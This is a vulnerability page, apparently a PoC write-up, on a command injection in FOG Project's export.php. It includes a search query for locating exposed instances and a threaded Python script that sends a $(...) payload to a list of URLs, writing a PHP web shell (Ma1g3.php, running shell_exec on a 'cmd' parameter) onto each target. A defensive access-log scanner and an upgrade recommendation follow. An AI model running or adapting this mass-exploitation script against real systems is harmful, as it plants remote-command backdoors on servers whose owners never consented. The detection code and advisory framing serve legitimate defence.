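Vulnerability description
FOG is a cloning/imaging/rescue suite/inventory management system. In versions prior to 1.5.10.34, the file packages/web/lib/fog/reportmaker.class.php in FOG is affected by a command injection vulnerability in the filename parameter of /fog/management/export.php.
Affected versions
FOGPROJECT < 1.5.10.34
Search query
Hunter (鹰图) platform: web.body="FOG Project"
Batch script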
import requests
import threading


class fog_poc:
    def __init__(self, file_path):
        # Strip quotes that get pasted around the path
        file_path = file_path.replace('\"', '')
        file_path = file_path.replace('\'', '')
        with open(file_path, 'r') as f:
            self.url_list = f.readlines()

    def poc(self):
        # Build the PoC request: the filename value is a $(...) command
        # substitution, so this request writes Ma1g3.php on the target
        url_path = '/fog/management/export.php?filename=$(echo+\'<?php+echo+shell_exec($_GET["cmd"]);+?>\'+>+Ma1g3.php)&type=pdf'
        header = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}
        data = 'fogguiuser=fog&nojson=2'
        threads = []

        def test_url(url):
            url = url.replace('\n', '')
            header['Host'] = url.split('//')[1]
            url1 = url + url_path
            try:
                requests.packages.urllib3.disable_warnings()
                response = requests.post(url1, data=data, headers=header, verify=False)
                # A Content-Disposition header in the response is treated as a hit
                if 'Content-Disposition' in response.headers:
                    print(url + '存在此漏洞!!!')  # "vulnerable"
                    with open('漏洞url.txt', 'a') as f:
                        f.write('\n' + url)
                else:
                    print(url + '没有此漏洞')  # "not vulnerable"
            except Exception as e:
                print(e)

        # One thread per URL in the input file
        for url in self.url_list:
            thread = threading.Thread(target=test_url, args=(url,))
            threads.append(thread)
            thread.start()
        for thread in threads:
            thread.join()


if __name__ == '__main__':
    file_path = input('请输入url文件路径:')  # prompt: "enter the path to the URL file"
    test = fog_poc(file_path)
    test.poc()
Example
Exploitation
Remediation
Upgrade to a secure version.
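To look for attempts against the filename parameter described above, the following added example (not from the original page or the FOG project) scans web access-log lines for export.php requests whose decoded filename contains shell metacharacters. The log format (Apache/nginx combined), the metacharacter set, the sample lines and all names in the code are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed log format: Apache/nginx "combined" (client, timestamp, request line, status).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# Assumed set of characters that let a value break out of a shell command line.
SHELL_META = re.compile(r'[`$;|&<>\r\n]')
EXPORT_PATH = "/management/export.php"  # suffix match, in case FOG is not under /fog

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "POST /fog/management/export.php?filename=Host+List&type=pdf HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2025:10:05:12 +0000] "POST /fog/management/export.php?filename=$(id)&type=pdf HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2025:10:05:13 +0000] "POST /fog/management/export.php?filename=%60id%60&type=pdf HTTP/1.1" 200 298',
    '192.0.2.10 - - [01/Jan/2025:10:06:00 +0000] "GET /fog/management/index.php?node=home HTTP/1.1" 200 9000',
]


def suspicious_export_requests(lines):
    """Return one dict per export.php request whose filename has shell metacharacters."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        client, when, method, target, status = m.groups()
        try:
            parts = urlsplit(target)
        except ValueError:
            continue  # malformed request target
        if not parts.path.lower().endswith(EXPORT_PATH):
            continue
        # parse_qsl percent-decodes and maps "+" to a space, as PHP does for $_GET.
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            found = sorted(set(SHELL_META.findall(value)))
            if key == "filename" and found:
                hits.append({"line": lineno, "client": client, "time": when,
                             "method": method, "status": int(status),
                             "filename": value, "metachars": found})
    return hits


if __name__ == "__main__":
    for hit in suspicious_export_requests(SAMPLE_LOG):
        print(hit)
```

The request on this page carries filename in the query string, so it appears in access logs even though the method is POST. Because that request writes Ma1g3.php, any hit also warrants a check for unexpected PHP files under the FOG web directory.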
References
https://github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8j